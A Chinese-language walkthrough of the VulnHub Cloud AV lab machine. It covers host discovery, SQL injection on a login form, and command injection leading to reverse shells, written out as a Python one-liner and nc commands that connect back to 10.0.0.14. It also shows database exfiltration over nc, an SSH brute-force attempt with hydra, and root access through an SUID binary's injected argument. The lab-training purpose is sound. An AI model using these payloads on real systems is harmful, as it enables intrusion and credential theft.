02 - BOREDHACKERBLOG CLOUD AV

02 - BOREDHACKERBLOG: CLOUD AV

0x01 下载地址

BoredHackerBlog: Cloud AVwww.vulnhub.com

0x02 靶机目标

获取靶机root权限

0x03 工具准备

0x04 详细步骤

主机发现

for i in $(seq 1 254); do sudo arping -c 2 10.0.0.$i; done
sudo nmap -p- 10.0.0.20
sudo nmap -p22,8080 -sV 10.0.0.20

Web信息收集

攻击思路：1、SQL注入；2、暴力破解（密码为password）

启动Burp抓包
启动浏览器-设置代理-打开 http://10.0.0.20:8080

Tip：建议使用Burp Intruder在输入框测试所有可以键盘输入的字符，检测系统返回情况。

通过观察测试得知输入"可使程序报错，且爆出如下内容

'select * from code where password=&quot;' + password + '&quot;'

select * from code where password=&quot; + password + &quot;

select * from code where password="; + password + ";

SQL注入

构造攻击代码

select * from code where password="; + " or 1=1-- + ";

" or 1=1--

命令注入（nc串联）

测试是否存在注入漏洞

hello | id

反弹Shell

方法一：使用Python反弹Webshell

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.14",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

方法二：如果受害主机存在nc指令，可以使用nc反弹shell

hello | which nc

Kali主机启动监听5555端口

nc -nvlp 5555

靶机

nc 10.0.0.14 5555 -e /bin/sh #有的Linux发行版有nc命令，但没有-e参数，可以使用如下方法
或者
nc 10.0.0.14 5555 | /bin/sh | nc 10.0.0.14 6666 #nc串联

监听5555端口终端输入命令，监听6666端口的终端回显命令

系统信息收集（nc传输文件）

id
ls

cat app.py
file database.sql

经分析database.sql是sqlit数据库文件，是Web应用的数据库文件
通过NC传输database.sql文件到kali主机，再查看数据内容
启动kali主机nc监听

nc -lnvp 7777 > db.sql

nc 5555终端

nc 10.0.0.14 7777 < database.sql

稍等一会后，使用Ctrl+C结束监听7777端口的终端

ls 查看db.sql已经在Kali主机上了

用sqlite数据库打开db.sql文件，获取密码

sqlite3
.open db.sql
.database
.dump

明文密码：

myinvitecode123
mysecondinvitecode
cloudavtech
mostsecurescanner

查看系统拥有Shell权限的用户

cat /etc/passwd | grep /bin/bash

系统用户名名单：

root
cloudav
scanner

SSH密码爆破（尝试失败）

vi user.txt
vi passwd.txt
hydra -L user.txt -P passwd.txt ssh://10.0.0.20

再次系统信息收集（发现具有sid权限的文件）

ls -l /home/scanner

分析上图得知：update_cloudav.c可能为update_cloudav的源码，且update_cloudav具有sid权限，且属主为root

代码审计

通过对update_cloudav.c的源码进行审计，发现运行update_cloudav在运行云查杀的时候一定要带参数。由此可以设想携带我们需要命令来实现root身份反弹shell。

NC串联、本地提权

kali主机监听7777、8888

nc -lnvp 7777
nc -lnvp 8888

反弹Shell

./update_cloudav "a|nc 10.0.0.14 7777 | /bin/sh | nc 10.0.0.14 8888"

补充：Burp-Intruder暴力破解登录密码（略）

Kali自带的密码字典在/usr/share/wordlists

上一页01 - SOCIAL NETWORK 下一页03 - CHRONOS 1

最后更新于2年前

这有帮助吗？